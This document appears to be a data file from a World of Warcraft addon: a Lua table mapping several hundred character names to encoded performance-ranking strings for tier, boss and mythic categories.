["Andres"] = "ET:403/93%EB:622/81%EM:706/76%",
["Xieyao"] = "ET:399/93%EB:523/92%EM:541/89%",
["Skadi"] = "LT:753/95%LB:762/96%EM:801/84%",
["Thicaf"] = "ST:708/99%LB:753/95%LM:897/98%",
["Turboyo"] = "ET:609/80%EB:742/94%EM:831/86%",
["Kitebyme"] = "RT:474/65%EB:505/88%RM:596/66%",
["Marqo"] = "RT:513/68%LB:748/95%LM:937/96%",
["Citlalicue"] = "LT:663/98%EB:725/91%EM:902/92%",
["Dig"] = "RT:490/67%LB:767/96%EM:928/94%",
["Bangdon"] = "ET:722/93%LB:762/96%LM:943/96%",
["Atomistik"] = "LT:563/97%LB:731/98%LM:967/97%",
["Dver"] = "ET:670/87%EB:682/87%EM:757/81%",
["Mmgmage"] = "RT:198/68%RB:526/70%EM:515/85%",
["Wesleysnipe"] = "ET:688/89%LB:757/95%LM:952/97%",
["Maokai"] = "RT:512/67%EB:532/89%EM:809/84%",
["Yumekui"] = "LT:769/97%LB:792/98%LM:960/97%",
["Flamehost"] = "UT:316/41%EB:554/77%EM:743/80%",
["Karthass"] = "UT:235/30%LB:759/96%EM:928/94%",
["Surfingguy"] = "RT:526/70%EB:630/86%EM:780/88%",
["Glassy"] = "ET:609/81%LB:774/97%EM:850/87%",
["Im"] = "ET:561/76%EB:723/92%EM:895/91%",
["Drenzi"] = "ET:349/90%EB:750/94%LM:954/96%",
["Thebattousai"] = "ET:658/86%LB:770/97%LM:878/98%",
["Kalaka"] = "ET:265/78%EB:602/93%EM:811/84%",
["Aerides"] = "LT:673/98%LB:737/98%EM:930/94%",
["Depressolace"] = "LT:767/97%LB:725/95%EM:740/85%",
["Renon"] = "ET:291/83%EB:715/90%LM:936/95%",
["Kaige"] = "LT:646/98%LB:666/96%EM:883/91%",
["Buddyclubx"] = "ET:346/90%LB:672/97%LM:768/95%",
["Itschefy"] = "ET:422/93%EB:665/91%EM:732/86%",
["Biccboieh"] = "ET:719/92%LB:742/98%LM:818/96%",
["Wtswaterr"] = "UT:120/45%RB:368/53%RM:499/55%",
["Grigri"] = "ET:678/88%LB:751/95%EM:907/92%",
["Kaérael"] = "RT:427/56%RB:512/73%",
["Rollhundred"] = "ET:312/86%EB:516/91%EM:636/76%",
["Chickenzz"] = "ET:695/90%EB:744/94%SM:1007/99%",
["Mekdruid"] = "LT:557/97%EB:374/79%RM:591/69%",
["Mismomo"] = "ET:252/81%EB:647/88%EM:640/81%",
["Murdir"] = "ET:612/81%LB:776/98%SM:1019/99%",
["Reuse"] = "LT:750/95%LB:760/96%EM:907/94%",
["Kierantal"] = "ET:653/85%LB:722/98%EM:631/89%",
["Sayuki"] = "ET:388/91%EB:565/91%EM:481/81%",
["Draining"] = "ET:695/90%LB:748/95%EM:744/80%",
["Bearabletank"] = "ET:515/90%LB:777/98%EM:723/89%",
["Toukan"] = "RT:438/60%EB:560/75%EM:751/80%",
["Chunkyphilis"] = "LT:463/95%EB:572/92%EM:753/94%",
["Pwrap"] = "LT:526/97%RB:263/59%RM:523/55%",
["Yeahyeah"] = "RT:402/53%RB:559/74%RM:574/62%",
["Oldpeigege"] = "LT:759/97%LB:655/97%LM:919/95%",
["Roguelord"] = "CT:172/22%EB:641/81%RM:683/72%",
["Popandlock"] = "ET:705/91%EB:738/93%EM:884/93%",
["Môrty"] = "ET:357/90%LB:636/95%EM:737/93%",
["Xiyeop"] = "UT:229/29%EB:675/85%EM:845/87%",
["Nalak"] = "ET:300/86%EB:475/85%LM:791/96%",
["Gütts"] = "LT:495/96%EB:717/91%EM:746/81%",
["Thebook"] = "RB:475/64%RM:495/55%",
["Xerospecter"] = "ET:254/77%EB:605/79%RM:701/74%",
["Nielak"] = "UT:103/41%EB:574/75%RM:315/63%",
["Perforate"] = "RT:193/65%RB:533/68%EM:782/81%",
["Marellion"] = "ET:310/85%EB:600/93%EM:881/91%",
["Alika"] = "UT:104/41%RB:539/71%RM:343/69%",
["Lokdog"] = "ET:284/82%EB:722/91%EM:795/83%",
["Sporks"] = "ST:715/99%EB:621/87%EM:626/83%",
["Cawksooker"] = "RT:543/71%EB:381/75%RM:538/60%",
["Chadsky"] = "EB:641/83%EM:807/84%",
["Firemuffin"] = "ET:362/92%EB:515/88%EM:652/90%",
["Spookyz"] = "RB:406/54%CM:113/14%",
["Effect"] = "EB:656/83%EM:774/81%",
["Zvennos"] = "RT:534/70%EB:625/81%EM:819/86%",
["Ikebana"] = "EB:577/76%EM:749/79%",
["Chizm"] = "LT:631/98%EB:555/91%RM:712/74%",
["Rimuli"] = "ET:651/86%EB:621/94%LM:939/96%",
["Goodstein"] = "EB:684/86%EM:835/86%",
["Tierceron"] = "ET:733/94%LB:776/97%EM:618/89%",
["Heartworm"] = "EB:412/79%EM:810/84%",
["Danovan"] = "ET:675/91%EB:661/90%LM:771/98%",
["Liteworkk"] = "UT:72/25%EB:688/87%EM:779/81%",
["Steelwolf"] = "CT:98/17%EB:466/84%EM:851/88%",
["Maxdarkfire"] = "ST:739/99%LB:730/98%LM:959/96%",
["Arkadious"] = "UB:357/47%RM:622/66%",
["Sap"] = "ET:266/79%LB:759/95%EM:943/94%",
["Dkcz"] = "RB:510/67%EM:638/90%",
["Krizzy"] = "RT:441/60%EB:689/88%EM:779/82%",
["Dahvae"] = "ET:514/77%EB:679/90%EM:818/85%",
["Shortstash"] = "LT:464/95%LB:743/96%LM:959/97%",
["Winstock"] = "ET:667/87%EB:718/91%LM:912/95%",
["Welby"] = "LT:748/95%LB:653/96%SM:931/99%",
["Seniorita"] = "LT:549/97%EB:610/79%EM:743/78%",
["Xec"] = "EB:667/84%RM:604/65%",
["Skeetswingin"] = "RT:490/67%EB:500/87%EM:476/80%",
["Freesurgery"] = "CT:101/17%RB:436/57%RM:445/51%",
["Prrplex"] = "LT:478/95%EB:461/83%RM:654/68%",
["Okikurumi"] = "ET:547/86%EB:617/87%EM:730/86%",
["Icyxnveins"] = "ET:732/94%EB:722/94%LM:920/96%",
["Ploshe"] = "LT:762/96%EB:728/92%SM:985/99%",
["Bahumbug"] = "RT:505/67%EB:550/77%UM:395/46%",
["Buspass"] = "EB:540/76%RM:570/67%",
["Pyroz"] = "RT:383/51%EB:736/93%EM:866/90%",
["Mightyal"] = "EB:370/81%EM:791/89%",
["Rukwho"] = "LT:703/95%SB:804/99%SM:971/99%",
["Fargus"] = "ET:291/85%EB:450/83%EM:826/88%",
["Kobean"] = "RB:225/52%RM:466/69%",
["Gentren"] = "ST:708/99%LB:641/98%LM:682/97%",
["Lurogar"] = "UT:335/43%EB:550/90%UM:306/36%",
["Shomedeway"] = "CT:155/24%EB:638/82%EM:698/76%",
["Roselilyana"] = "CT:155/24%CB:37/6%RM:613/72%",
["Mâsâ"] = "UB:208/28%RM:573/63%",
["Unlimit"] = "RB:261/62%RM:549/60%",
["Millie"] = "EB:568/75%RM:646/71%",
["Violentdream"] = "UB:305/34%RM:506/58%",
["Dabomei"] = "ET:693/90%LB:636/95%EM:846/87%",
["Badmenz"] = "LT:510/96%EB:599/83%EM:790/84%",
["Khareen"] = "LT:455/95%EB:719/92%EM:853/89%",
["Drugsnothugs"] = "ET:276/82%EB:505/90%EM:735/85%",
["Bööts"] = "LT:659/98%EB:739/93%LM:830/97%",
["Moosecat"] = "ET:372/92%LB:758/95%EM:905/92%",
["Ghelendir"] = "ET:636/84%EB:664/89%EM:488/86%",
["Malyce"] = "ET:737/94%LB:656/96%EM:709/93%",
["Chompskey"] = "LT:646/98%LB:643/97%EM:710/94%",
["Coffeemate"] = "ET:601/82%EB:428/83%RM:514/57%",
["Bbabu"] = "ET:704/91%LB:681/97%LM:977/98%",
["Senjyo"] = "RT:511/68%RB:483/70%EM:419/78%",
["Ryddian"] = "ET:593/79%LB:756/95%EM:906/93%",
["Gunter"] = "LT:461/95%EB:744/94%LM:933/95%",
["Malaga"] = "RT:515/72%RB:497/69%RM:280/65%",
["Nolegs"] = "ET:255/79%EB:626/82%EM:739/80%",
["Masopholis"] = "ET:409/94%EB:727/92%LM:796/96%",
["Entities"] = "ST:752/99%LB:746/98%EM:856/88%",
["Bloodseeker"] = "ST:773/99%LB:731/96%LM:938/97%",
["Shortilock"] = "ET:590/79%EB:660/85%RM:706/73%",
["Tycer"] = "ET:258/80%RB:253/61%RM:221/56%",
["Yinch"] = "RT:412/54%EB:615/85%RM:526/58%",
["Balistix"] = "RT:217/72%EB:589/77%RM:655/73%",
["Zanid"] = "ET:272/82%EB:649/89%EM:760/82%",
["Wrenz"] = "LT:567/97%LB:678/97%EM:898/91%",
["Thizzlebang"] = "ET:690/90%EB:653/85%EM:404/81%",
["Danishbread"] = "ET:694/90%LB:766/96%EM:755/81%",
["Snowbaal"] = "ET:423/94%EB:468/88%EM:559/90%",
["Dreadghoul"] = "ET:643/84%LB:737/98%EM:833/88%",
["Jackfrost"] = "LT:520/96%EB:498/90%EM:630/93%",
["Holloway"] = "ET:644/89%LB:645/97%LM:953/95%",
["Lolzed"] = "RT:186/63%EB:392/77%EM:808/84%",
["Arrival"] = "LT:645/98%EB:395/82%EM:710/77%",
["Vindael"] = "ST:700/99%EB:578/92%EM:407/75%",
["Momyspankme"] = "LT:711/97%LB:780/98%SM:1005/99%",
["Renalprobe"] = "ET:363/91%EB:721/91%EM:899/92%",
["Mortican"] = "RT:557/74%EB:549/90%EM:884/91%",
["Karrc"] = "RT:445/60%EB:398/78%EM:766/81%",
["Molson"] = "ET:378/92%EB:735/93%LM:957/97%",
["Smallghost"] = "ET:722/92%EB:724/92%EM:872/91%",
["Lancewu"] = "RT:500/66%RB:369/74%RM:687/74%",
["Ofcitscassie"] = "CT:170/21%UB:204/26%UM:151/45%",
["Pewpshoot"] = "ET:671/88%LB:752/95%EM:924/94%",
["Buzzy"] = "CT:80/14%RB:526/69%CM:99/13%",
["Lovelytroll"] = "ET:358/90%LB:775/97%LM:964/97%",
["Murx"] = "UT:351/48%RB:217/50%",
["Hunda"] = "ET:685/89%LB:743/98%LM:800/96%",
["Shêlby"] = "RT:393/51%EB:629/86%EM:759/82%",
["Phoenixes"] = "ET:317/86%EB:574/92%EM:847/88%",
["Twonine"] = "ET:609/80%EB:661/85%EM:899/92%",
["Cicy"] = "LT:749/97%SB:731/99%LM:648/96%",
["Calbur"] = "ET:295/82%LB:629/95%LM:810/96%",
["Bobana"] = "LT:639/98%EB:687/91%EM:806/90%",
["Gardric"] = "LT:753/96%LB:766/97%LM:935/96%",
["Dhampir"] = "ST:742/99%LB:694/97%LM:941/96%",
["Tchlolw"] = "ET:358/91%EB:401/78%EM:773/81%",
["Lazsummonus"] = "ET:339/87%EB:619/80%EM:876/90%",
["Fortress"] = "LT:767/97%SB:831/99%LM:965/98%",
["Lolsy"] = "RT:149/55%RB:475/63%RM:629/69%",
["Nevermorre"] = "ET:640/84%EB:560/91%RM:675/70%",
["Porhub"] = "ET:672/87%EB:536/89%RM:595/64%",
["Bandenger"] = "ST:705/99%SB:792/99%LM:735/97%",
["Rafazel"] = "ET:575/76%EB:702/89%EM:877/92%",
["Sbrek"] = "ET:655/85%LB:732/98%EM:902/92%",
["Deathuponyou"] = "LB:776/97%LM:951/96%",
["Doomrotarax"] = "RT:377/52%RB:547/72%EM:811/84%",
["Huntingthots"] = "LT:510/96%EB:745/94%EM:894/93%",
["Paladinu"] = "UT:102/38%EB:525/89%EM:825/85%",
["Magicish"] = "ET:390/93%EB:700/92%LM:948/97%",
["Xiaoqu"] = "CT:60/24%EB:720/90%EM:806/90%",
["Pepticgnome"] = "ET:724/93%LB:767/96%LM:876/98%",
["Azraelle"] = "ET:706/91%LB:763/96%LM:954/96%",
["Alies"] = "EB:416/80%EM:787/84%",
["Rankfourteen"] = "EB:499/91%EM:839/88%",
["Gnomebiz"] = "ET:571/75%EB:730/92%EM:867/89%",
["Serepanor"] = "UT:224/32%RB:548/72%RM:631/70%",
["Hhuummeerr"] = "CT:32/8%RB:510/68%EM:790/82%",
["Widow"] = "LT:535/97%EB:584/92%EM:822/85%",
["Orgoglio"] = "RB:377/50%RM:539/60%",
["Perdak"] = "CT:52/21%RB:474/62%UM:298/30%",
["Shendelz"] = "RB:467/59%RM:701/74%",
["Flumbii"] = "UT:324/42%EB:646/83%RM:623/68%",
["Hazydayz"] = "RT:416/57%EB:500/87%EM:627/89%",
["Nwk"] = "ET:620/81%EB:709/89%EM:746/93%",
["Mefan"] = "ET:366/92%EB:581/82%EM:811/90%",
["Sunder"] = "LT:744/96%SB:717/99%LM:918/95%",
["Mintys"] = "EB:747/94%EM:877/91%",
["Kaladryn"] = "EB:509/88%LM:952/97%",
["Chaospower"] = "RT:206/70%EB:687/87%EM:726/77%",
["Tonganstrong"] = "ET:416/94%EB:574/92%RM:401/74%",
["Xal"] = "LT:620/98%EB:584/92%EM:870/93%",
["Booey"] = "LT:463/96%EB:585/92%EM:919/94%",
["Boudika"] = "SB:808/99%LM:984/98%",
["Muzzve"] = "ET:689/89%LB:760/95%EM:867/89%",
["Bouncey"] = "LT:689/96%SB:748/99%LM:712/96%",
["Rainbowzy"] = "ET:354/91%EB:627/94%LM:947/96%",
["Magallo"] = "ET:670/87%SB:809/99%LM:972/98%",
["Zinch"] = "LT:760/96%LB:765/96%LM:935/95%",
["Drozero"] = "UT:360/47%EB:680/87%EM:801/84%",
["Liftoff"] = "ET:727/93%EB:745/94%LM:946/97%",
["Nachosupreme"] = "LT:747/95%EB:742/94%LM:923/95%",
["Amphie"] = "RB:384/55%RM:565/62%",
["Mybignose"] = "CB:122/15%UM:68/26%",
["Dorowen"] = "CT:27/1%RB:544/72%RM:278/68%",
["Necrolich"] = "RT:180/61%EB:510/78%EM:649/92%",
["Michellekwan"] = "ET:716/92%EB:660/89%EM:634/93%",
["Killjoys"] = "LT:469/96%EB:717/93%LM:650/95%",
["Gyn"] = "EB:621/81%EM:771/82%",
["Ðhugain"] = "UT:291/38%LB:760/96%EM:790/84%",
["Thôtt"] = "CT:35/3%EB:731/93%EM:876/91%",
["Seiu"] = "EB:632/86%RM:310/72%",
["Løgz"] = "RT:449/59%EB:712/93%EM:501/87%",
["Souldestroy"] = "LT:539/97%LB:745/96%LM:941/98%",
["Soopes"] = "CB:83/20%RM:621/68%",
["Crimsondemon"] = "ET:464/94%EB:625/81%EM:815/84%",
["Aalokz"] = "LT:488/96%EB:569/92%EM:581/87%",
["Scubaing"] = "ET:661/87%LB:753/95%EM:842/87%",
["Telxon"] = "LT:619/98%EB:493/91%EM:898/93%",
["Harlow"] = "ST:782/99%SB:766/99%LM:899/98%",
["Ilovesensei"] = "ET:623/81%EB:461/83%RM:624/68%",
["Oshabi"] = "ET:376/92%EB:646/88%RM:478/56%",
["Ruoji"] = "LT:616/98%EB:645/83%RM:561/62%",
["Bobbybingo"] = "LT:520/96%RB:307/69%EM:395/76%",
["Desinious"] = "ST:749/99%LB:717/98%SM:918/99%",
["Ferenth"] = "ET:369/91%EB:733/92%LM:938/95%",
["Raesa"] = "LT:755/97%SB:732/99%LM:929/96%",
["Hunner"] = "ET:581/79%EB:693/88%EM:900/92%",
["Korudo"] = "ET:248/78%EB:528/75%UM:433/47%",
["Cursemaster"] = "ET:350/88%EB:703/90%EM:463/79%",
["Magicmanuh"] = "ET:571/76%EB:593/83%EM:763/87%",
["Topshelfonly"] = "ET:664/87%RB:280/67%EM:502/87%",
["Dansmore"] = "UT:250/32%EB:719/92%EM:888/92%",
["Vancouverpig"] = "LT:491/96%LB:724/98%EM:903/92%",
["Decayforever"] = "RT:549/73%RB:549/72%RM:589/64%",
["Lonart"] = "RT:187/65%UB:224/30%RM:532/58%",
["Psychoblade"] = "RT:397/52%RB:502/64%RM:684/73%",
["Wizonemit"] = "ET:578/78%EB:729/92%EM:813/84%",
["Cheekyboi"] = "ET:605/81%EB:657/84%EM:850/85%",
["Nightburger"] = "ET:557/81%EB:725/94%EM:894/94%",
["Vinceftw"] = "ET:655/86%EB:720/91%EM:715/77%",
["Deatherella"] = "RT:507/68%RB:550/73%EM:705/81%",
["Bendaksk"] = "ET:300/85%EB:591/78%EM:820/87%",
["Coreupt"] = "ET:629/83%LB:721/95%LM:730/96%",
["Desire"] = "ET:632/83%EB:419/80%EM:896/92%",
["Avish"] = "ET:645/86%LB:775/97%EM:776/81%",
["Ihuntnoobs"] = "RT:503/70%EB:635/83%EM:782/82%",
["Goosehunt"] = "RT:542/74%EB:653/85%EM:839/88%",
["Shineey"] = "RT:418/55%EB:459/87%EM:765/87%",
["Krypts"] = "UT:371/49%EB:727/93%EM:861/90%",
["Baochun"] = "RT:418/56%EB:610/80%EM:735/79%",
["Remmington"] = "ET:672/88%EB:661/86%EM:864/90%",
["Ryawhitefang"] = "ST:758/99%LB:659/96%LM:864/97%",
["Wuge"] = "ET:321/85%EB:692/88%RM:536/58%",
["Lokoh"] = "ET:703/91%LB:707/98%LM:925/95%",
["Travisbob"] = "RT:236/74%EB:669/86%EM:713/92%",
["Ççæv"] = "ET:707/91%EB:520/89%RM:676/73%",
["Hexrivi"] = "ET:561/75%LB:775/97%EM:919/94%",
["Dx"] = "UT:205/26%RB:206/53%UM:419/49%",
["Goskymonkey"] = "ET:235/75%EB:352/77%EM:484/86%",
["Mallgoth"] = "RT:144/54%RB:508/67%RM:303/65%",
["Takeme"] = "LT:742/95%SB:751/99%EM:822/85%",
["Fathersbane"] = "CT:30/6%EB:607/79%RM:586/64%",
["Alphalaxerr"] = "ET:662/90%EB:637/87%EM:814/90%",
["Touchan"] = "ET:681/93%EB:630/91%LM:897/97%",
["Chaokeai"] = "ET:693/90%EB:676/87%EM:799/85%",
["Acaulescent"] = "ST:769/99%SB:772/99%SM:862/99%",
["Yourolduncle"] = "ET:684/92%LB:771/98%EM:861/94%",
["Creepbibi"] = "ET:573/76%LB:763/96%LM:988/98%",
["Modist"] = "ET:390/93%LB:751/96%EM:822/91%",
["Barlado"] = "RT:454/71%EB:620/87%EM:827/91%",
["Spunkle"] = "ET:683/91%EB:541/93%RM:475/69%",
["Kaio"] = "LT:609/98%LB:659/97%LM:941/97%",
["Ohnose"] = "ET:248/78%EB:622/81%UM:277/28%",
["Snake"] = "CT:0/0%RB:450/61%EM:766/81%",
["Maimeng"] = "ET:646/89%EB:644/88%EM:566/80%",
["Toother"] = "RB:577/74%EM:808/84%",
["Maxlor"] = "UT:87/35%EB:653/82%RM:604/65%",
["Dyrtesloot"] = "RT:378/53%EB:579/76%EM:517/83%",
["Giantwrath"] = "ET:664/87%EB:641/88%EM:820/87%",
["Hotshøt"] = "LT:760/96%SB:760/99%LM:940/96%",
["Catstealer"] = "UT:273/36%RB:521/67%EM:706/75%",
["Maggotbrain"] = "ET:340/88%EB:653/84%EM:858/88%",
["Stabulces"] = "UT:352/47%EB:666/84%EM:835/86%",
["Kalewarrior"] = "RT:516/70%EB:625/81%EM:719/93%",
["Ruakai"] = "EB:666/84%EM:753/79%",
["Kielo"] = "ET:632/84%EB:716/90%LM:939/95%",
["Doomreaper"] = "ET:275/84%EB:668/85%EM:793/89%",
["Playboinate"] = "EB:720/90%EM:777/82%",
["Daytonaman"] = "ET:276/82%LB:767/96%EM:791/85%",
["Patchwork"] = "LT:475/96%LB:753/96%LM:967/98%",
["Freeluck"] = "LT:592/97%EB:744/94%LM:939/97%",
["Ticklenipple"] = "LT:493/96%EB:713/93%EM:786/89%",
["Conads"] = "RB:554/73%RM:318/67%",
["Jelliee"] = "ET:310/90%LB:735/96%LM:730/96%",
["Lowgen"] = "ET:289/82%EB:708/90%EM:824/85%",
["Elduderino"] = "EB:574/92%EM:591/87%",
["Shampton"] = "LT:740/95%LB:759/96%LM:903/95%",
["Ryes"] = "RT:479/63%RB:549/73%RM:623/67%",
["Hito"] = "CT:0/2%EB:602/77%RM:395/72%",
["Megaprofit"] = "ET:423/94%LB:727/95%EM:892/92%",
["Skin"] = "CT:106/13%RB:455/61%CM:191/23%",
["Canofcorn"] = "LT:771/98%LB:783/98%LM:931/97%",
["Jacktblade"] = "ST:736/99%SB:738/99%LM:797/98%",
["Aburisushi"] = "RT:540/71%EB:611/94%EM:544/83%",
["Luminol"] = "LT:551/97%LB:778/97%LM:962/97%",
["Zxt"] = "LB:729/98%LM:789/96%",
["Poorstudent"] = "UT:256/38%EB:584/77%EM:582/87%",
["Juriza"] = "UT:316/43%EB:564/75%EM:727/77%",
["Meruden"] = "UT:89/32%EB:374/76%RM:657/70%",
["Shekellgank"] = "RB:562/72%EM:790/82%",
["Bizmarky"] = "UT:298/38%LB:746/96%LM:766/97%",
["Melisandrey"] = "ET:327/86%EB:744/94%LM:936/95%",
["Riddloc"] = "RT:467/62%LB:752/95%EM:924/94%",
["Revgk"] = "RT:147/52%EB:499/88%RM:656/70%",
["Taankz"] = "RT:387/56%RB:406/54%RM:323/68%",
["Realzy"] = "UT:365/49%RB:495/71%UM:215/27%",
["Zik"] = "LT:470/96%LB:705/98%LM:968/98%",
["Dlk"] = "EB:645/84%RM:683/73%",
["Moreal"] = "ET:252/78%EB:452/84%EM:635/89%",
["Xiyeli"] = "ET:727/93%EB:737/93%EM:822/87%",
["Gerolice"] = "LT:554/97%EB:743/94%EM:866/89%",
["Mugroso"] = "ET:361/89%EB:595/93%EM:540/84%",
["Stugotz"] = "ET:389/91%LB:641/95%EM:925/94%",
["Madmad"] = "RB:227/53%",
["Obds"] = "ET:472/81%EB:668/91%EM:817/91%",
["Pikahgold"] = "RT:162/58%LB:750/95%LM:942/96%",
["Dorfis"] = "UB:282/38%RM:622/64%",
["Byefrost"] = "ET:309/86%EB:568/80%EM:646/75%",
["Leatheslem"] = "RT:487/64%EB:635/87%EM:521/88%",
["Carlor"] = "ST:697/99%LB:765/96%LM:944/97%",
["Feralheart"] = "RT:128/68%EB:370/76%RM:247/56%",
["Cellendor"] = "LT:464/95%EB:717/91%EM:883/91%",
["Insatiablee"] = "LT:629/98%EB:657/85%EM:779/81%",
["Surelysurly"] = "ET:288/86%EB:582/84%EM:814/85%",
["Shootingyou"] = "ET:611/83%EB:741/93%EM:897/91%",
["Parthewall"] = "LT:472/96%EB:746/94%LM:818/96%",
["Zxszxszxs"] = "ET:584/79%EB:450/84%EM:865/89%",
["Doozyj"] = "ET:716/92%LB:678/97%LM:942/95%",
["Lodors"] = "ET:284/84%EB:553/75%EM:738/78%",
["Durrf"] = "ET:723/93%EB:744/94%EM:875/90%",
["Schlubnwater"] = "ET:583/78%EB:549/78%EM:637/76%",
["Bakinbacon"] = "RT:385/50%RB:503/67%RM:616/66%",
["Kewua"] = "ET:324/89%LB:769/96%LM:964/97%",
["Bmbrett"] = "ET:395/93%EB:672/87%EM:611/89%",
["Scytale"] = "ET:697/90%LB:771/97%EM:909/93%",
["Kangbank"] = "ET:688/89%LB:756/95%EM:851/88%",
["Zugshot"] = "ST:741/99%LB:709/98%LM:800/96%",
["Crowtron"] = "ET:650/86%EB:672/87%",
["Trollma"] = "ST:796/99%EB:725/94%LM:907/96%",
["Weasleyy"] = "LT:651/98%EB:679/91%LM:830/97%",
["Mcthuggy"] = "ET:616/82%EB:469/85%EM:439/79%",
["Neuroff"] = "ET:722/93%LB:766/96%EM:899/92%",
["Domofeeder"] = "ET:685/89%LB:671/97%EM:859/88%",
["Lynnfairy"] = "UT:107/41%RB:257/62%EM:837/88%",
["Aroladys"] = "RT:541/72%LB:729/95%EM:823/90%",
["Kidvicious"] = "RT:442/60%EB:726/91%EM:854/88%",
["Bunli"] = "ET:687/89%EB:555/79%EM:690/81%",
["Zells"] = "UT:122/46%RB:486/69%EM:714/82%",
["Maomimi"] = "RT:409/59%EB:702/88%EM:821/85%",
["Trscuithead"] = "LT:775/98%LB:751/96%LM:735/97%",
["Invage"] = "RT:491/66%RB:424/62%UM:308/37%",
["Fãshi"] = "ET:335/89%UB:356/49%EM:398/81%",
["Soope"] = "LT:545/97%EB:690/88%RM:633/68%",
["Brunt"] = "ST:810/99%LB:787/98%LM:800/98%",
["Mugsy"] = "ET:642/85%EB:662/86%EM:816/86%",
["Kelilina"] = "ET:712/91%LB:760/95%EM:737/94%",
["Kithtokyo"] = "RT:503/69%LB:770/97%EM:867/89%",
["Natang"] = "UT:121/46%RB:189/50%EM:825/84%",
["Kelomagic"] = "ET:605/80%RB:455/66%EM:407/77%",
["Plsmeng"] = "RT:459/61%RB:467/63%RM:658/71%",
["Limehaze"] = "LT:474/95%LB:756/95%LM:918/95%",
["Kidnis"] = "ET:556/76%EB:618/82%RM:633/69%",
["Mingalarpar"] = "ET:639/83%EB:441/82%EM:716/76%",
["Vaschue"] = "ET:354/91%EB:608/77%EM:728/77%",
["Donnz"] = "ET:573/78%EB:739/93%EM:863/89%",
["Swallowsavvy"] = "UT:366/48%EB:635/83%RM:637/70%",
["Krities"] = "ET:627/88%LB:747/95%EM:864/93%",
["Meefy"] = "LT:402/97%LB:707/95%LM:946/97%",
["Hibeefball"] = "RT:542/72%EB:696/89%UM:241/30%",
["Nocsio"] = "ET:655/91%EB:560/87%LM:687/97%",
["Kang"] = "ET:715/94%EB:645/87%EM:800/90%",
["Novavon"] = "ET:272/79%EB:646/83%EM:831/86%",
["Tinytank"] = "ET:589/79%RB:356/61%CM:34/5%",
["Donthealme"] = "ET:720/94%LB:766/97%LM:786/98%",
["Wangzai"] = "ET:688/90%EB:718/92%EM:541/89%",
["Goodcake"] = "ET:271/82%EB:397/78%EM:505/82%",
["Glutz"] = "EB:743/93%EM:739/78%",
["Rickyboy"] = "RT:479/65%EB:607/79%EM:726/93%",
["Kodiax"] = "ST:674/99%LB:605/96%EM:675/85%",
["Jordril"] = "ET:275/82%EB:660/85%RM:568/61%",
["Stealthsalsa"] = "ET:249/76%EB:451/83%RM:701/74%",
["Kronzz"] = "UT:106/42%RB:528/70%RM:640/68%",
["Leakystrudel"] = "EB:582/81%EM:648/75%",
["Slickfix"] = "CT:131/17%EB:677/85%EM:813/84%",
["Slimween"] = "UT:113/43%LB:736/95%EM:738/84%",
["Steadfast"] = "LT:549/97%LB:762/97%LM:976/98%",
["Chocolnoodle"] = "ET:373/92%LB:758/95%LM:956/97%",
["Noot"] = "LT:504/96%LB:632/95%EM:461/79%",
["Aeldaria"] = "ET:365/91%LB:750/95%EM:739/94%",
["Pedro"] = "RT:485/67%LB:762/96%LM:935/95%",
["Ðonut"] = "UT:208/31%EB:597/76%RM:634/68%",
["Rankó"] = "UT:328/46%EB:700/88%EM:874/90%",
["Slideonyu"] = "ET:334/88%EB:627/80%EM:791/82%",
["Stmuppet"] = "LT:763/96%SB:762/99%EM:447/78%",
["Smackthataxe"] = "LT:517/97%EB:582/92%EM:870/90%",
["Kazashi"] = "RB:550/73%RM:301/65%",
["Bloodworder"] = "LT:439/95%EB:532/92%EM:805/90%",
["Treway"] = "RT:533/71%LB:763/96%EM:903/93%",
["Sinicole"] = "CT:105/13%EB:465/84%EM:438/75%",
["Redkillock"] = "RT:418/56%LB:755/95%EM:925/94%",
["Gaiying"] = "EB:554/91%EM:765/80%",
["Azky"] = "RB:488/65%RM:617/67%",
["Losu"] = "ET:251/77%EB:691/87%EM:732/77%",
["Johnstone"] = "RB:573/73%EM:752/79%",
["Critzkrieg"] = "RT:234/74%EB:668/84%EM:884/90%",
["Rumour"] = "UT:321/41%EB:562/91%EM:565/84%",
["High"] = "UT:216/28%SB:807/99%LM:976/98%",
["Kkangg"] = "RT:529/70%RB:551/73%EM:781/82%",
["Ciina"] = "LT:492/95%LB:640/95%EM:887/91%",
["Kraznak"] = "ET:333/89%LB:667/96%EM:553/85%",
["Thillzjr"] = "RT:526/71%EB:718/91%EM:752/80%",
["Qoss"] = "ET:262/80%EB:625/81%EM:667/91%",
["Kenshun"] = "UT:94/35%RB:574/73%EM:709/75%",
["Kamylla"] = "UB:109/47%UM:194/49%",
["Beachmuscles"] = "ET:380/93%EB:448/83%RM:639/68%",
["Klayne"] = "RT:262/71%RB:172/71%EM:531/88%",
["Bombcruise"] = "RT:180/64%RB:518/69%EM:571/91%",
["Ebo"] = "LT:668/98%EB:693/88%EM:894/92%",
["Jannet"] = "ET:573/76%EB:736/93%EM:911/93%",
["Loisgriffin"] = "EB:456/88%EM:808/91%",
["Maxfli"] = "UB:251/29%CM:38/11%",
["Billcosbytwo"] = "ET:449/94%EB:600/94%EM:865/89%",
["Nickdecane"] = "ET:338/90%EB:701/88%EM:811/84%",
["Psymage"] = "EB:639/83%EM:654/94%",
["Geo"] = "ET:665/87%EB:705/90%EM:935/94%",
["Silentflip"] = "ET:616/81%LB:750/95%EM:858/88%",
["Lubizzle"] = "ET:415/94%EB:678/91%EM:910/93%",
["Seleb"] = "RT:233/72%EB:626/82%RM:647/69%",
["Momentum"] = "ET:725/93%LB:750/95%LM:856/97%",
["Chutuan"] = "RT:521/71%EB:721/92%EM:799/83%",
["Furypanda"] = "LT:771/97%LB:736/98%RM:639/66%",
["Xyrul"] = "RT:225/72%EB:708/89%EM:908/90%",
["Coshim"] = "ET:638/88%LB:604/96%EM:854/92%",
["Youarora"] = "ET:691/90%EB:495/87%EM:387/75%",
["Shemail"] = "ET:582/78%EB:537/90%RM:673/74%",
["Macky"] = "ET:363/91%LB:654/96%EM:820/85%",
["Gibdo"] = "RT:420/56%RB:490/71%EM:449/81%",
["Bulletime"] = "RT:525/72%EB:751/94%LM:938/95%",
["Notpq"] = "ET:706/94%EB:637/92%LM:884/96%",
["Miledia"] = "UT:336/44%UB:335/45%RM:635/69%",
["Razilon"] = "UT:112/40%CB:119/15%UM:394/45%",
["Lilpop"] = "ET:669/87%LB:761/96%EM:869/89%",
["Ourea"] = "ET:691/90%LB:791/98%LM:943/95%",
["Florise"] = "LT:648/98%LB:657/97%EM:662/93%",
["Sonpih"] = "ET:584/80%EB:744/94%EM:847/87%",
